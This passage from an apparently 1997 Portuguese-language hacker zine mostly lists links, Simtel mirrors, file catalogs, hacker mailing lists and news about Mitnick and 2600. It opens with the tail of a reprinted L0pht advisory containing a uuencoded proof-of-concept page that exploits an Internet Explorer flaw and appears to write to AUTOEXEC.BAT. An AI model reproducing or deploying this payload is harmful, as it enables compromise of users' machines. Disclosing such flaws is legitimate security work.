WINDOWS EXPLORER. (put it on a website and download it or * * click on the IE desktop icon (run iexplore.exe) and type in the name * * of the file into the URL line) IT WON'T WORK OTHERWISE!!!! * * (though it could be made to do so) * ************************************************************************* ----====/ SNIP section 1 of uuencode 5.20 of file infect.htm by R.E.M. begin 644 infect.htm M/&AT;6P^#0H\:&5A9#X-"CQT:71L93X-"DEN=&5R;F5T($5X<&QO:71E<@T* M/"]T:71L93X-"CPO:&5A9#X-"CQB;V1Y(&)G8V]L;W(](T9&1D9&1B!T97AT M/2,P,#`P,#`^#0H-"CQC96YT97(^#0H\:#$^5VAA="!D;R!)('=A;G0@=&\@ M:6YF96-T('1O9&%Y/SPO:#$^#0H-"D-L:6-K(&AE<F4@=&\@;6]D:69Y(&%U M=&]E>&5C+F)A=#QP/@T*#0H\82!H<F5F/2(-"G)E<SHO+[C$0=B`+8"`@("0 MD)"0D)"+V#/)@,&J`]FQ7XH3@.)_B!-#XO:0D)"0D%"0D&H"D)"0NNW"6`&! MZ@$!`0&04KNW\O>_@.^`_]-:6E"0D#/;LP)3@^L$4U"[X(#YO__3@^P,D%A0 M,]NS.5.[#-+G$('K$!"0$%-0N[#*^;__TX/$#)"0D)"[SX#YO__3D)"0N["O M^+__TY"0D,S,+2TM+2TM+2TM+2TM+4,Z7$%55$]%6$5#+D)!5("-BD5#2$\@ M34E#4D\D3T94(#!73EH@64]5+BXN(%)%4$5.5"!!3D0@0D4@4T%6140AC8I0 M055318V*@"TM+2TM+2TM+2TM+2TM+2U!04%!0D)"0D,!(+Z_1$1$143!5R\- M"B(^#0H\9F]N="!F86-E/2)7:6YG9&EN9W,B('-I>F4]*S8^_SPO9F]N=#X\ M9F]N="!S:7IE/2LV/CT\+V9O;G0^/&9O;G0@9F%C93TB5VEN9V1I;F=S(B!S M:7IE/2LV/B9G=#PO9F]N=#X-"CPO83X-"@T*/"]C96YT97(^#0H-"CPO8F]D ->3X-"CPO:'1M;#X-"CX- ` end sum -r/size 62455/917 section (from "begin" to "end") sum -r/size 5779/643 entire input file /====---- SNIP A haiku: Microsoft IE Is there no security? Not if you ask me. dildog@l0pht.com (11/1/97) ------------------------------------------------------------------------------- For more L0pht (that's L - zero - P - H - T) advisories check out: http://l0pht.com/advisories.html --------------------------------------------------------------------------- ANTI-SPAM SOFTWARE http://members.aol.com/macabrus/utilities.html http://rs.internic.net/cgi-bin/whois Whois http://www.net.cmu.edu/bin/traceroute Traceroute http://www.anonymizer.com/ Anonymizer http://bogong.acci.com.au/~jon/agis/index.html Lotsa Spam-Fighting Tools http://www.netusa.net/~eli/filtering.html Newsgroup Moderation Software http://www.jazzie.com/ii/internet/procmail/ Infinite Ink's Procmail http://www.nepean.uws.edu.au:80/users/david/pe/blockmail.html Blocking Email http://www.acm.uiuc.edu/workshops/procmail/ Procmail Workshop http://www.jazzie.com/ii/internet/mailbots.html Mailbots http://www.netusa.net/~eli/faqs/addressing.html Email Addressing FAQ http://www.jazzie.com/ii/faqs/archive/mail/filtering-faq Mail Filtering FAQ http://www-ucsee.eecs.berkeley.edu/~set/spam More Email Filtering ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail Procmail FTP http://www-users.informatik.rwth-aachen.de/~berg/archive/ procmail/ Procmail Archive http://www.panix.com/e-spam.html Panix Email Resources http://www.cis.ohio-state.edu/hypertext/faq/usenet/mail/ filtering-faq/faq.html Another Mail Filtering FAQ http://kryten.eng.monash.edu.au/gspam.html Help Deciphering Headers http://digital.net/~gandalf/spamfaq.html Header Deciphering --------------------------------------------------------------------------- Paginas Juridicas Jus Navigandi (Pagina Juridica) --> http://www.geocities.com/Paris/1997 --------------------------------------------------------------------------- O PARA═SO CHAMADO SIMTEL Muitos nao conhecem um verdadeiro paraiso, na forma de software shareware, gratuito ou coisa do genero, disponivel nos chamados "mirror" dos Simtelnet, um dos mais antigos repositorios de software na rede internet. A vantagem, comparada com grandes sites www como www.shareware.com ou www.download.com e que e relativamente facil achar o que se que e ate o que nao se quer, nos indices.. Essa dica e meio de velha guarda, a maioria dos "velhos" fucadores comecou la (eu, por exemplo). Mas quem nao sabe, pode procurar que acha coisa interessante. Sem virus. | Australia/1 | Australia/2 | Austria | Brazil/1 | Brazil/2 | Bulgaria | | Canada | Czech Republic | Finland | Germany/1 | Germany/2 | Hungary | | Ireland | Israel | Italy | Korea | Norway | Romania | Slovakia | | Slovenia | South Africa/1 | South Africa/2 | Switzerland | | UK/1 | UK/2 | USA/1 | USA/2 | USA/3 | USA/4 | Abaixo, o URL (igonorar o -------> na hora de digitar) http://www.iniaccess.net.au/simtel.net/ ------>Australia/1 http://ftp.tas.gov.au/simtel.net/ ------>Australia/2 http://www.univie.ac.at/simtel.net/ ------>Austria http://ftp.unicamp.br/simtel.net/ ------>Brazil/1 http://simtel.correionet.com.br/simtel.net/ ------>Brazil/2 http://www.eunet.bg/simtel.net/ ------>Bulgaria http://mirror.direct.ca/simtel.net/ ------>Canada http://pub.vse.cz/simtel.net/ ------>Czech Republic http://ftp.funet.fi/mirrors/simtel.net/ ------>Finland http://www.tu-chemnitz.de/HOME/fischer/simtel.net/ ------>Germany/1 http://www.ruhr-uni-bochum.de/simtel.net/ ------>Germany/2 http://www.simtel.iif.hu/ Hungary http://www.hea.ie/simtel.net/ ------>Ireland http://www.cs.huji.ac.il/simtel.net/ ------>Israel http://serviceftp.flashnet.it/simtel.net/ ------>Italy http://www.iWorld.net/simtel.net/ ------>Korea http://archive.bitcon.no/simtel.net/ ------>Norway http://www.sorostm.ro/simtel.net/ ------>Romania http://ftp.uakom.sk/simtel.net/ ------>Slovakia http://ftp.arnes.si/simtel.net/ ------>Slovenia http://simtel.saix.net/ South Africa/1 http://simtelnet.is.co.za/ South Africa/2 http://sunsite.cnlab-switch.ch/simtel.net/ ------>Switzerland http://ftp.globalnet.co.uk/simtel.net/ ------>UK/1 http://micros.hensa.ac.uk/+misc/simtel.net/ ------>UK/2 http://www.simtel.net/simtel.net/ ------>USA/1 http://oak.oakland.edu/simtel.net/ ------>USA/2 http://ftp.epix.net/simtel.net/ ------>USA/3 http://download.romt.com/simtel.net/ ------>USA/4 Para dar um exemplo do que se pode achar la, vejamos a lista abaixo (escolhida do subdiretorio pub/simtel.net/msdos/info) Ah, sim. E' preciso lembrar que estou pensando no pessoal que programa e quer aprender a mexer com computador ao escolher esta lista e nao no pessoal que le uma das internet-nao-o-que da vida que so quer e brinquedinho..: asm9709h.zip (970923) 65K Sep 97 x86 Assembly Language FAQ, HTML format asm9709t.zip (970923) 54K Sep 97 x86 Assembly Language FAQ, text format asp804.zip (961030) 381K Association of ShareWare Professionals catalog aspdat71.zip (970131) 60K ASP membership list and info in DBF format author35.zip (960407) 40K List of MS-DOS PD & SW author e-mail addresses bbstip12.zip (920808) 5K Effective Shareware distribution via the BBS bestpr54.zip (970212) 26K Timo's choice of best MS-DOS/Win PD/FW/SW pgms bgi20.zip (960522) 375K Computer-based Internet tutorial for beginners biosdos.zip (870813) 24K List of BIOS error codes and what they mean bkache56.zip (921203) 173K Tutorial discusses back pain relief calfaq.zip (960904) 20K Frequently asked questions about calendars chap32.zip (890715) 16K Brief summary of copyright laws cnd7301.zip (940103) 71K ASP ShareWare authors quick-lookup catalog com3com4.txt (910131) 5K Notes on using COMM ports 3 and 4 config.zip (870124) 13K How to setup CONFIG.SYS & AUTOEXEC.BAT copro16a.zip (940925) 73K Article on numeric coprocessors for PCs cpucmp14.zip (930613) 12K Perf. comparison 386DX/38600DX/486DLC/RapidCAD dcc9224.zip (921002) 129K List of over 1,000 computer clubs nationwide devdriv.zip (851107) 3K Tutorial on DOS device drivers diagtxt.zip (861212) 10K PC error diagnosis and memory error list disk-art.zip (890609) 22K Articles discussing disks by Steve Gibson dos32v4.zip (860517) 4K Patches to MS-DOS version 3.2 dosfv206.zip (960331) 56K FAQ from comp.os.msdos.programmer newsgroup doshlp20.zip (950624) 523K DOSHelp v2.0: Basic DOS Commands Tutor dosimp10.zip (910811) 253K New DOS 5.0 tutorial, for new and oldtimers dosmnual.zip (870222) 10K DOS manual for beginners. Printable dosref33.zip (940120) 282K List of interrupts, memory locations, IO ports dostips.zip (871214) 12K Helpful hints on some DOS functions dostips1.zip (851125) 65K DOS tips from various magazines - part 1 of 6 dostips2.zip (851125) 58K DOS tips from various magazines - part 2 of 6 dostips3.zip (851125) 45K DOS tips from various magazines - part 3 of 6 dostips4.zip (860629) 59K DOS tips from various magazines - part 4 of 6 dostips5.zip (871018) 60K DOS tips from various magazines - part 5 of 6 dostips6.zip (870405) 43K DOS tips from various magazines - part 6 of 6 dostutor.zip (860405) 94K Learn MS-DOS - an interactive tutorial drdostip.zip (920101) 62K DR DOS 6.0 Tech Tips (1/2/92) from DRI BBS dtarev1.zip (890118) 17K Review of SpinRite & Disk Technician Advanced emailadr.zip (930828) 20K Baker's PC Industry E-mail address listing emailgui.zip (910104) 6K How to send E-Mail from one network to another ext_ram.zip (890516) 5K Good discusion of extended vs expanded RAM faqc9709.zip (970928) 106K Frequently Asked Questions of comp.compression faqclp.zip (960226) 13K Frequently Asked Questions of comp.lang.pascal faqclpb.zip (960422) 8K comp.lang.pascal.borland newsgroup Mini-FAQ ftp-list.zip (970506) 410K List of Internet sites with FTP & mail access ftp2uk23.zip (920409) 8K Unix scripts (2) for JANET FT-RELAY ftpgrep.zip (940419) 1K Perl script: Search ftp-list w/regular expr. gameport.inf (900519) 3K How to: read game port, schematic, hookup info geozone4.zip (940830) 5K Internet address two-letter country codes list glos2.zip (900225) 63K Glossary of Telecomputing terms inter55a.zip (970928) 353K Comprehensive list of interrupt calls, 1of4 inter55b.zip (970928) 353K Comprehensive list of interrupt calls, 2of4 inter55c.zip (970928) 353K Comprehensive list of interrupt calls, 3of4 inter55d.zip (970928) 506K Comprehensive list of interrupt calls, 4of4 inter55e.zip (970928) 273K Utility programs for interrupt list inter55f.zip (970928) 214K WinHelp hypertext conversion programs inthlp10.zip (941111) 53K Interrupt Helper: Viewer for interrupt list intshare.zip (910805) 6K Info on software interrupt-sharing protocol intwin54.zip (970630) 4.2M R.B.'s Interrupt List 54, Windows Help format intwin55.zip (970930) 4.2M Interrupt List 55, Windows Help format ip_hook.zip (910326) 30K Information on hooking up a PC to the Internet jarg300a.zip (930728) 467K Jargon-File 3.0.0 (Hacker's Dictionary), ASCII jarg300n.zip (940303) 521K Jargon-File 3.0.0 (Hacker's Dictionary), NG laptut58.zip (921205) 228K Laptop Tutorial, tips/tricks for laptop users maxcat.zip (930910) 447K Catalog of over 600 ShareWare programs mdive5a.zip (960428) 30K Heart attack risk assessment program mf2.zip (901215) 2K TSR shows program's memory usage while running mkdata.zip (940914) 60K 1000 Internet email,telnet,ftp,gopher,WWW,URLs moder62.zip (971018) 29K List of MS-DOS FTP sites and their moderators modwks20.zip (950107) 140K Modem Workshop v2.0: Modem book on disk mrdos231.zip (900105) 147K DOS tutorial, beginner to hard disk, text/quiz muf17.zip (960407) 64K MicroSoft's Undocumented Features, Vol 1, No 7 newlaw.zip (901002) 3K New copyright legislation, shareware problems nos2.zip (970324) 957K The Prophecies of Nostradamus v2.0 nulcable.zip (910118) 3K How to make serial/parallel null modem cables packftp.zip (941223) 450K Anonymous FTP Sitelist conversion program pccdemo.zip (931219) 577K PC Complete disk magazine, issues 1 and 2 pcgpe10.zip (960628) 701K The PC Games Programmers Encyclopedia 1.0 pcl60a.zip (960612) 223K Pc-Learn: Beginners Computer Tutorial, 1 of 2 pcl60b.zip (960612) 200K Pc-Learn: Beginners Computer Tutorial, 2 of 2 psychek2.zip (950527) 25K Find out your management/personality style pwrwds23.zip (960722) 227K Power words: 4,500 wise and witty quotations redirect.zip (900817) 9K Advanced DOS tips on rerouting, piping, edlin relative.zip (871201) 2K Graphs relative speed of CPU res16sw.zip (950503) 1.2M Monitor repair procedure database. ShareWare rstutor.zip (881104) 96K Tutor for communications, serial interface rurarj.zip (970711) 11K RURARJ: Arj compression command set sut56.zip (920705) 44K Tutorial on how to use and enjoy Shareware tsfaqp38.zip (971113) 123K Common Turbo Pascal questions & Timo's answers useful35.zip (940508) 26K Useful MS-DOS programs at Simtel.Net and Garbo zen10.zip (920630) 65K Jun 1992 Zen and the Art of the Internet Esta outra lista vem do subdiretorio simtel.net/msdos/c (para quem quer aprender a linguagem C e fazer coisas interessantes): Filename Date Size Description actlib17.zip (931025) 86K General purpose libs w/source for C/C++ pgmers advc11.zip (870423) 9K Thomas Hanlin's advanced 'C' routines. v.1.1 asynlib2.zip (910320) 17K ASYNC communications library callable from 'C' bestl232.zip (940912) 323K Extensive C programmer's library (FreeWare) bin2c.zip (960903) 9K Convert a binary file to a C structure bituudec.c (871224) 7K MSDOS/VMS UUdecode fixes lost trailing spaces bltc127.zip (961115) 220K Bullet C/C++ 16-bit btree/DBF database engine bmp2cp11.zip (970920) 23K BMP file to C/C++ source file converter btoa.zip (890124) 4K 'C' source for binary-to-ascii convert pgm bullet25.zip (970702) 895K Database engine for DOS32,Win32s,Win95,NT,OS/2 c--final.zip (961128) 640K Sphinx C--: Compiler, examples & source c-eval.zip (930423) 21K C source to evaluate mathematical expressions c-flow.zip (850624) 43K Display flow of 'C' programs c4window.zip (850806) 32K Window routines for 'C' programs c60probs.zip (900617) 6K List of problems found with MS C v6.0 cacoph10.zip (940419) 7K PC speaker music library for Turbo C and C++ calendah.zip (970124) 9K ANSI C source for calendar calculations cbase102.zip (910922) 267K C routines for database applications, w/docs cbooks.zip (890629) 9K List of currently available C language books cc01.zip (850828) 3K 'C' language functions and programs - 1 of 4 cc02.zip (860103) 65K 'C' language functions and programs - 2 of 4 cc03.zip (860103) 81K 'C' language functions and programs - 3 of 4 cc04.zip (851125) 78K 'C' language functions and programs - 4 of 4 ccc1053a.zip (891224) 26K Complete C: learn/experiment w/OO systems,1of3 ccc1053b.zip (891224) 217K Complete C: learn/experiment w/OO systems,2of3 ccc1053c.zip (891224) 293K Complete C: learn/experiment w/OO systems,3of3 ccdl151e.zip (970704) 423K 32 bit C compiler for DOS/DPMI ccdl151l.zip (970704) 443K 32 bit C compiler run time library ccdl151s.zip (970704) 219K 32 bit C compiler sources ccompile.zip (850605) 35K Small 'C' compiler cdecl.zip (871020) 11K Decomposes 'C' language declarations cephes25.zip (960913) 600K Mathematical function library in C language cfgop110.zip (950802) 48K I/O for Windows type INI/CFG files. (C source) cfog102.zip (950501) 52K C source code obfuscator cgazv5n3.zip (910507) 44K Code from the C Gazette - Spring 1991 issue cl_7_bug.zip (921008) 17K Bug examples for Microsoft C-Compiler CL-7.00 cm100exe.zip (911115) 51K MAKE for MSC/WIN SDK (exe and samples), 1of4 cm100hlp.zip (911115) 109K MAKE for MSC/WIN SDK (QuickHelp), 2of4 cm100txt.zip (911115) 49K MAKE for MSC/WIN SDK (Help: text format), 3of4 cmake100.zip (911115) 1K MAKE for MSC/WIN SDK (description), 4of4 cnews001.zip (880622) 6K Issue #1 'C' programmer's newsletter cnews002.zip (880622) 5K Issue #2 'C' programmer's newsletter cnews003.zip (880205) 20K Issue #3 'C' programmer's newsletter cnews004.zip (880221) 42K Issue #4 'C' programmer's newsletter cnews005.zip (880307) 70K Issue #5 'C' programmer's newsletter cnews006.zip (880410) 28K Issue #6 'C' programmer's newsletter cnews007.zip (880529) 9K Issue #7 'C' programmer's newsletter cnews008.zip (880614) 57K Issue #8 'C' programmer's newsletter cnews009.zip (880717) 64K Issue #9 'C' programmer's newsletter cnews010.zip (880815) 49K Issue #10 'C' programmer's newsletter cnews011.zip (880909) 30K Issue #11 'C' programmer's newsletter cnews012.zip (881030) 12K 'C' programming & compiler review #12 cnews013.zip (881227) 37K 'C' Elec. Newsletter/Journal Vol 2 #13 cnews014.zip (890222) 62K 'C' Elec. Newsletter/Journal Vol 2 #14 cnews015.zip (890704) 24K 'C' Elec. Newsletter/Journal Vol 2 #15 cnews016.zip (890726) 56K 'C' Elec. Newsletter/Journal Vol 2 #16 cnews017.zip (890924) 16K 'C' Elec. Newsletter/Journal Vol 2 #17 cnews018.zip (891228) 39K 'C' Elec. Newsletter/Journal Vol 2 #18 cnews019.zip (900804) 28K 'C' Elec. Newsletter/Journal Vol 2 #19 commasm.zip (880713) 7K Info for programming MS-DOS COMM ports configf.zip (950430) 2K Use Windows-like config files in C (w/src) conio.zip (870608) 8K Direct console I/O ASM routines for MicrosoftC consl10.zip (950930) 122K Console text output 16/32 bit C/C++ library consl11.zip (960616) 94K Console text output 16/32 bit C/C++ library cp14.zip (920319) 25K C code outliner (DDJ8808, tweaked for BC++2.0) cpc2.zip (960121) 138K CodePrint for C/C++ Version 2.02 Jan 1996 cprot217.zip (920614) 102K C and C++ incremental prototypes extractor crc-c.zip (870729) 4K CRC routines for C crnchr22.zip (930412) 67K C Libs - FFT,Wavelet,Coherence,Filter,Regr.etc gencsrc.zip (871120) 90K Coronado's Generic 'C' tutor v2.0, (1 of 2) genctxt.zip (871120) 105K Coronado's Generic 'C' tutor v2.0, (2 of 2) mc302pc1.zip (940318) 190K MICRO-C PC 'C' compiler v3.02 miracle.zip (961205) 268K Miracle C Compiler v1.7 t2c.zip (871201) 100K Microsoft's Turbo Pascal to C translator zcc096.zip (961104) 245K Small C compiler, assembler and linker for DOS Tem muita coisa em C, tentei selecionar acima, mas foi impossivel.. imagine C++ entao.. cptuts22.zip (920119) 75K Coronodo C++ Tutorial: Source examples, 1/2 cptutt22.zip (920119) 105K Coronodo C++ Tutorial: Tutorial text files 2/2 cslib211.zip (970520) 793K Database library for C++ developers dos_win1.zip (940709) 186K Windows-like GUI for DOS. BC++ 3.1 source code jptui4db.zip (971115) 705K Textual user interface for Borland C++ 4.x knowhow4.zip (950120) 574K Borland C++ SDK, DOS, source codes. GUI + more memman2c.zip (950316) 45K XMS/EMS/Virtual *Flat* Memory for C++/C newmat09.zip (971013) 169K C++ classes for matrix manipulation objeas3a.zip (940829) 502K Graphic/text user interface C++ library, 1of2 objeas3b.zip (940829) 238K Graphic/text user interface C++ library, 2of2 prnstr15.zip (951023) 21K Printer Stream Lib for Borland C++ programmers sdesg10b.zip (950904) 77K Sprite Designer for XLIB, c++ for sprite lib. serial_1.zip (900513) 4K C++ source code routines for serial ports tsr100je.zip (930320) 70K TSR class for Borland C++ (with source) No simtel.net/msdos/sysutils pode-se por exemplo, encontrar emuladores de UNIX pra DOS e outros baratos (todas as listas estao incompletas). autocmos.zip (940922) 2K CMOS memory read/write/auto repair utility dos94-01.zip (961023) 490K Windows 95 style utility menu for DOS fcii_2_1.zip (891216) 81K File Commando v2.1, a PC Tools clone, 1 of 3 fcii_2_2.zip (891216) 88K File Commando v2.1, a PC Tools clone, 2 of 3 fcii_2_3.zip (891209) 73K File Commando v2.1, a PC Tools clone, 3 of 3 irqr.zip (880422) 4K Report status of IRQ channels,w/TP4 & MS C src is_con10.zip (911220) 3K Report if handle is associated with console jbalarm.zip (910617) 22K Alarm/reminder w/multiple sounds. Works w/WIN3 jcfg100.zip (961122) 18K Assigns/swaps 'dummy' drive letters jobs32.zip (890415) 7K JOBS v3.20 - DOS shell/Disk manager, 1 of 3 jobs32a1.zip (890415) 125K JOBS v3.20 - DOS shell/Disk manager, 2 of 3 jobs32a2.zip (890415) 127K JOBS v3.20 - DOS shell/Disk manager, 3 of 3 portfix.zip (960312) 15K Fixes SMC super I/O port lockup on 486/Pentium porttool.zip (930112) 173K 16 Unix-like tools ported to MS-DOS sil2.zip (851013) 6K Silence PC speaker silence.zip (851231) 3K Turns PC speaker on and off siren.zip (891205) 7K Make siren sounds on PC speaker skey40.zip (911223) 325K Keystroke emulation and batch file utilities sysfs10.zip (970620) 65K System File Save: Backup/restore system files tstsr21.zip (960810) 97K TSR pgms noboot/reslock/timedown/timeup, etc. ud16_v33.zip (971110) 4.2M All 62+ Unix 32-bit utilities for MS-DOS undoc2eh.zip (890108) 2K Demo of undocumented interrupt service 2Eh uptime.zip (910119) 2K Time in days/hours/mins/secs since system boot uptimer.zip (961022) 5K System timer update from real-time clock util1.zip (951024) 123K A group of utilities for MS-DOS utils1.zip (890727) 2K Misc. utilities by E. Miller utl115.zip (960405) 168K Utilities with file viewer and printer support uxutl23a.zip (960226) 238K Unix-like utilities for DOS. Rel 2.3. 1of4 uxutl23b.zip (960226) 227K Unix-like utilities for DOS. Rel 2.3. 2of4 uxutl23c.zip (960226) 221K Unix-like utilities for DOS. Rel 2.3. 3of4 uxutl23d.zip (960226) 160K Unix-like utilities for DOS. Rel 2.3. 4of4 uznix120.zip (960226) 332K UZfulnix v1.20: Unix-like utilities for MS-DOS zutils02.zip (951016) 52K Collection of tiny utils HD/file related, lock Por ultimo, claro que e' besteira reclamar pra mim que so' tem DOS aqui.. Existem tambem subdiretorios especificos para WIN95, Win 3.11 .. nao to dizendo que as pessoas devam ir atras e procurar ai'. Mas pode valer a pena. E' uma forma de garimpar informacao. Basta ir atras dos arquivos 00_index.txt da vida. Ate mail bomb e fake mail se encontra. DICAS DE SOFTWARES Um amigo, especialista em cracks e coisas do genero, me contou de um cara desesperado pra conseguir um jeito de usar estes softwares. Depois que li a descricao do que faz esses trocos, achei que deveria juntar isso como dica. Afinal, nem sempre eu tenho tempo de conhecer tudo. O Zip Folders parece particularmente interessante.. nao sei onde se consegue nenhum, talvez no www.shareware.com ou www.cdrom.com.. Wingroov 0.9ec executa midis Vueprint 5.4 visualiza imagem e midis Pica View 32 mostra telas em formato thumbs dentro do windows explorer... Zip Folders 1.0 permite acessar pastas zipadas.... Thumbs 3.0 visualizador de imagens, com recursos de converter formatos --------------------------------------------------------------------------- DICAS DE SITES MUITO, MAS MUITO INTERESSANTES.. http://www.alexa.com http://www.iss.net/xforce/ http://www.altavista.magallanes.net/ http://www.datasoft.com.br/marconci/hack.htm http://www.ntshop.net/security/exploits.htm http://www.l0pht.com/ http://berlin.ccc.de/ http://oliver.efri.hr/~crv/security/bugs/NT/nt.html http://www.ntmag.com/ http://www.ugu.com http://lebeau.home.ml.org http://www.savilltech.com/ntfaq.html http://microlink.com.br/~buick/dragons.htm http://www.xs4all.nl/~jojo/jogos http://premium.microsoft.com/support/kb/articles/q150/7/34.asp http://www.dicas-l.unicamp.br <---- Muiiito interessante --------------------------------------------------------------------------- Maquinas de busca em espanhol Ole Ozu El otro Ozu Whom Where El Buscon El buscador magico Buscador de Archivos http://www.ole.es Ole http://www.ozu.com Ozu http://www.ozu.es El otro Ozu http://www.spanish.whomwhere.com Whom Where http://194.51.86.22 El Buscon http://www.ctv.es/USERS/amartin El buscador magico http://www.filez.com/espanol2.html Buscador de Archivos Um acontecimento contra a liberdade de opiniao e expressao na Espanha HTTP://ELCASO.VESATEC.COM/#prensa --------------------------------------------------------------------------- Hacker-zines brasileiros Estao saindo uma pa de novos zines. Acho isso legal pacas, ja que um dos motivos que criei o Barata Eletrica e exatamente estimular o pessoal a fazer coisa ainda melhor. O chato e que alguns estao simplesmente "puxando" e "copiando" material de outros, algumas vezes ate assumindo como se fossem autores da materia, isso quando nao inventam de "encher linguica" com lista de serial numbers. Outra coisa que esta se tornando meio que habito e fazer pagina na Geocities, que esta cacando e apagando paginas de todo mundo. Todo mundo, literalmente. Se brincar, minha pagina nao esta la. A Geocities tirou. Alguns zines sao ruins, nao tem outra palavra. Outros, da pra ver que o cara ainda pode fazer algo legal. E tem outros que o cara teve uma otima ideia. Nao vou falar quais. O duro e sobreviver e continuar. Tem zine que e famosissimo. Mas nao passou do numero 2 em mais de 6 meses. Alias, tem varios nessa situacao. A lista abaixo nao define nenhum criterio de escolha e e provavel que tais paginas ja tenham sumido do mapa. Fica o registro historico, provavelmente vao renascer em algum lugar.. Ah, sim, ia me esquecendo: como tem zineiro ai que resolveu que meu fanzine nao presta, vou fazer a vontade dele e nao sujar seu nome colocando ele aqui. http://www.geocities.com/Paris/Metro/6720/ Conscience http://www.geocities.com/Broadway/6721/index.html Rato.br http://www.geocities.com/SiliconValley/Way/8650/policy.html Policy - seguranca em Unix http://www.geocities.com/Paris/Metro/6720/ Ezine Conscience http://www.complex-x.net/kaotik/ptzine/index.htm Fanzine de Portugal --------------------------------------------------------------------------- Nova lista Hackers Eu descobri um lugar onde qualquer um pode fazer sua propria lista e criei outra lista hackers, desta vez com o nome de hackers.braz Nao sei se vai ter o mesmo sucesso da anterior, que estava hospedada na esquina-das-listas, que todo mundo sabe, ja era. Pra se inscrever, va ate o url: http://www.coollist.com e se inscreva la na lista hackers.braz (nao confundir com a lista hackers, que tambem existe, tem alto volume de correspondencia, mas ta cheia de wannabe e lammer, alem de ser em ingles). Ao se inscrever, voce ira receber um email igual a este (mais ou menos) pedindo pra voce mandar um reply de confirmacao: > Date: > Thu, 25 Sep 1997 20:33:01 -0400 (EDT) > To: > fulano@rocketmail.com > From: > subscribe@coollist.com Add to Address Book > Subject: > Confirmation of Subscription > > > We have recently been requested by you to subscribe to this > > List: > > Please confirm that you want to subscribe by replying to this message. > > If this subscription is unsolicited, simply delete this message. > > Thank you. > > ---------------------------------------------------- > Get a FREE Mailing List at http://208.141.98.157/ > > > Para se desinscrever, manda email para unsubscribe@coollist.com A resposta deve ser: > Date: > Fri, 3 Oct 1997 23:48:09 -0400 (EDT) > To: > fulano@rocketmail.com > From: > unsubscribe@coollist.com Add to Address Book > Subject: > Unsubscribe Request > > > To unsubscribe from a Coollist Mailing List, just reply > to this message and enter the name or the email address of > your list between the square brackets: > > List: [ ] > > eg The address of the mailing list you post to > > Then enter an "X" in the box below: > > [ ] UNSUBSCRIBE > > You will be unsubscribed instantly. Thank you. > -------------------------------------------------------- > Get your FREE Mailing List. http://www.coollist.com > > > > O que rola e que a pessoa querendo se desinscrever coloca o nome da lista onde quer se desinscrever, tal como: > List: [hackers.braz ] > > eg The address of the mailing list you post to > > Then enter an "X" in the box below: > > [X] UNSUBSCRIBE Tudo isso e manda o reply de volta. Ai voce esta fora da lista. A confirmacao de inscricao ou des-inscricao vem depois, como por exemplo: > Date: > Sun, 28 Sep 1997 08:56:17 -0400 (EDT) > To: > Fulano de Tal > From: > hackers.braz@coollist.com Add to Address Book > Subject: > You have been subscribed > > > Note: This is an automated Response > > Congratulations! You have been subscribed to the hackers.braz list. > To post to this list, just email your posting to > "hackers.braz@coollist.com" > > To unsubscribe from this list, just send a blank email to: > unsubscribe@coollist.com > > If you did not ask to be subscribed, please send this email to > nospam@coollist.com > > If you encounter any problems at all, email support@coollist.com > > Thank you and Have fun! > ------------------------------------------------------ > Get your FREE Mailing List. http://www.coollist.com > > Detalhe importante: Esta lista pode ou nao se tornar uma sucessora da lista hackers. Tudo depende de quem estiver afim de se inscrever ou nao. Eu considerava a lista hackers como um ponto de encontro, onde todo mundo podia ter uma chance de se comunicar. Espero que o pessoal entre nessa. OUTRA LISTA HACKER(?) Essa contribuicao veio de um leitor: Majordomo@listserv.pegasus.com.br subscribe hacker seu@email --------------------------------------------------------------------------- LISTA CIBERCULTURA Esta e uma lista criada por Andre Lemos, Prof da Faculdade de Comunicacao da Universidade Federal da Bahia e tem como base a discussao de temas ligados a cultura Cyber (que nao e exatamente a ver com a cultura hacker, e bom notar). Se voce tiver interesse em discutir novas tecnologias, lances de cabeca, etc, tudo bem. Pedir cracks pra joguinho, perguntar como se faz para atravessar uma FIREWALL, como se tornar um hacker, isso dai nao tem absolutamente NADA a ver com a lista. Se voce tem alguma ideia sobre cultura cyber, esse e o lugar para entender, tentar entender ou discutir.. Para se inscrever: Enviar correio eletronico para listproc@ufba.br com o seguinte conteudo: subscribe cibercultura Seu-nome-fulano Para se desinscrever: Mesmo correio eletronico, outro conteudo: unsubscribe cibercultura Para ver informac⌡es: help, info, sei la.. o listproc devolve um arquivo em ingles com o funcionamento da coisa toda, se eu estiver errado. Para contribuir para a lista: Correio eletronico para cibercultura@ufba.br --------------------------------------------------------------------------- MITNICK NEWS To: cypherpunks@toad.com Subject: Mitnick Rings Bell 6 de novembro 1997, noticia da Digital Cellular Report: O governo americano adota linha dura com Mitnick. Hacker americano pede ajuda. Um "hacker" americano - Kevin David Mitnick - preencheu um pedido para ajuda financeira para lutar por sua defesa, atraves de seu advogado, Donald C Randolph de Santa Monica, EUA. Atraves de Randolph, Mitnick esta clamando que o governo americano esta procurando fazer dele um exemplo pela possessao de codigos de acesso nao-autorizados a (fone) celular. O caso e particularmente importante para o mercado norte-americano, onde fones celulares analogicos, ao inves de digitais, sao norma. Em uma das mais interessantes declarac⌡es, Mitnick afirma ter sido mantido em solitaria por 23 horas diarias, nu em uma cela de ar condicionado congelante por 8 meses e mandado para o chuveiro acorrentado. Talvez o aspecto mais intrigante em todo o caso e o fato de que enquanto o governo americano nunca procurou provar que Mitnick "faturou" de suas atividades de "hacker" - embora certamente pudesse ter feito tal coisa atraves da "venda" de tempo online para terceiros. Ao inves disso afirmam que ele causou perdas de 80 milh⌡es. Kevin certamente parece estar pagando o preco por feitos nefastos, tendo ja gastado proximo de dois anos em custodia, em cujo tempo foi proibido de fazer acesso a comunicac⌡es sem fio, software ou hardware. E' dificil saber exatamente qual lado esta mais paranoico, ja que Mitnick esta afirmando que sua sina e parte de um complo do governo americano para afastar o escrutinio que concerne a regulamentacao tanto das telecomunicac⌡es como da internet. http://www.kevinmitnick.com/ --------------------------------------------------------------------------- 2600 - Hacker Quaterly - α beira do abismo A ultima desgraca que esta rolando no pedaco e a noticia de que o mais famoso fanzine de Hackers, o 2600-Hacker Quaterly, esta a beira da falencia. A distribuidora do fanzine, (fazer o zine e uma coisa, vender por todo o pais, e tarefa da distribuidora) brincou demais com a grana dos caras e ... entraram em concordata ou coisa do genero. Os caras que assumiram a empresa depois tambem brincaram um pouco e parece que a coisa la vai mal. O Goldstein nao entrou em concordata, acha que da pra levar a empresa adiante, mas ta russa, a coisa. Se piorar, vai ser o terceiro fanzine famoso a sair do ar, junto 